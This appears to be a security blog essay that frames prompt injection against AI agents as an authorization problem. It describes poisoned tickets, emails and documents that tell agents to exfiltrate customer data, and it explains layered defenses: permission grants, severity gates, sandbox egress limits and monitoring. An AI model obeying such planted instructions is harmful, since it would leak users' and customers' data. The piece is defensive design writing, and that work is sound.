Most discussion of prompt injection asks the wrong question. It asks how to catch the malicious instruction hidden in a document, a web page, or a tool result. That is a filtering problem, and filtering problems are lost on a long enough timeline, because there are unlimited ways to phrase ignore your instructions.
The better question is what happens when the filter fails, when the agent is fully convinced to do the wrong thing. If the answer is that it does the wrong thing, you never had security. If the answer is that it tries, and the action is refused because the agent was never allowed to do it, you do. Prompt injection is an authorization problem.
Why filtering is the wrong frame
The standard defense is a classifier on the input: scan the document, the web page, the tool output for instructions that look like an attack. Do it. It helps. It will also miss. Natural language has unlimited paraphrases, the attacker iterates, and you cannot enumerate what you have not seen.
Picture the concrete case. A support agent reads an incoming ticket to draft a reply. Buried in the ticket text, formatted to look like a system note, is a line telling the agent to look up the customer table and paste it into the response. A good classifier catches the obvious version. The hundredth rephrasing, in a language the classifier was not tuned for, wrapped in a plausible workflow note, eventually gets through. You are now relying on having anticipated an adversary who only has to win once.
Worse, the content the agent has to read to do its job is exactly the content an attacker controls: the support ticket, the web page, the uploaded PDF. A defense that depends on perfectly classifying adversarial natural language is a defense that loses eventually. So we assume the model can be talked into anything, and we put the security somewhere the model's beliefs cannot reach.
Prompts are not the boundary
A prompt is an instruction to the model. It can shape what the agent tries. It cannot change what the agent is allowed to do. Those are two different systems. What the agent is allowed to do is decided by the authorization layer, which sits below the model and evaluates every action before it touches data, a tool, or a setting.
The model proposes; the authorization layer disposes. No sentence in any document can grant the agent a permission it does not have, because permissions are not granted by sentences. They are granted by an administrator, ahead of time, and checked at the moment of every action.
The default underneath all of it is fail-safe. No agent, tool, or cross-workspace path gets access until it is explicitly granted and allowed by policy. Silence means no. A malicious instruction has to overcome a system that starts by denying everything, and instructions cannot grant. Only administrators can.
The permission ceiling
Concretely, every agent runs under a set of grants: which resources it can reach, which tools it can call, at which severities. A poisoned document that says delete every record in the table reaches an agent with no delete grant, and the delete is refused at the authorization layer. Not the model declining out of good judgment, which is unreliable, but the system declining on the model's behalf, which is not.
The malicious instruction does not fail because the agent saw through it. It fails because the agent was never able to carry it out in the first place. That is the property you want: safety that does not depend on the model being smart enough to refuse.
Severity gates: a prompt cannot raise the ceiling
Some actions are more dangerous than others, and the system sorts them by severity. Reading accessible content is low. Sending externally, deleting content, and changing permissions are high. A grant says the agent may attempt an action. The user's authorization says how far it may go without asking again. A prompt cannot lift that line.
Picture an agent authorized to read and summarize a mailbox, then instructed by a poisoned message to forward the summary to an outside address. It hits a severity gate. External send is high, it was not authorized at that severity, and the action stops for human approval. The injection cannot escalate on its own, because escalation is a decision a person makes, not a string the model parses.
One attack, every layer
It helps to follow a single attack all the way down. A poisoned document tells a read-only research agent to export a customer list to an external address. First it meets the permission ceiling: the agent has read and summarize grants and no export tool, so export is not an action it can take at all.
Suppose, for the sake of argument, an admin had granted an export tool. The attack then meets the severity gate: sending externally is high, the user authorized the agent only up to low, and the action stops for approval. Suppose the user had pre-authorized that too. It then meets the network: the sandbox can reach nothing but the proxy, and the proxy has no allowlist entry for the attacker's address. Suppose even that. There is still no standing credential in the sandbox to authenticate the send. The attack has to win four times in a row, against four systems that do not care what the document said.
Containment is the backstop
Even if an agent is fully subverted and tries everything, two earlier layers cap the damage. The network is deny-by-default: the only way out is the proxy, so there is nowhere to send stolen data. Credentials live outside the sandbox and are attached per action by that proxy, so there is no secret to steal and no way to act outside the granted surface.
The permission ceiling, the severity gates, and the infrastructure containment are three independent layers. An injection has to defeat all three to do anything, when defeating the first one, the model, was supposed to be the entire attack. Depth like that is what turns a model that can be fooled into a system that holds anyway.
Watch the boundary, do not just trust it
The last layer is observation. Because every action and every tool call passes through the authorization layer and the proxy, unusual patterns are visible: a tool-call sequence that does not fit the task, an egress target no one expected, an agent repeatedly approaching a severity threshold it is not cleared for. None of that is the boundary, the boundary already held. It is how you notice that someone tried, and tighten before they try again.
The frame that scales with autonomy
There is a reason to prefer this frame beyond elegance. As agents get more capable and more autonomous, the set of things they can be talked into attempting only grows, and filtering their inputs only gets harder. The authorization surface does not grow with autonomy. The grants are the same whether the model is today's or something far stronger next year.
Anchoring safety to what the agent is allowed to do, rather than to what it can be talked into doing, is the rare security property that gets relatively stronger as the models improve, instead of weaker. The smarter the thing inside the sandbox, the more you want the boundary to sit below it, where intelligence does not help.
Put the security where the prompt cannot reach
The promise worth making about prompt injection is not that the model will never be fooled. Assume it will be. The promise is that a fooled model cannot do anything it was not already allowed to do. Put the security where the prompt cannot reach it, and the worst a malicious instruction can achieve is to make an agent attempt something and be told no.
That is a promise you can actually keep, because it does not require winning an arms race against language. It requires being strict about access, which is a thing software is good at.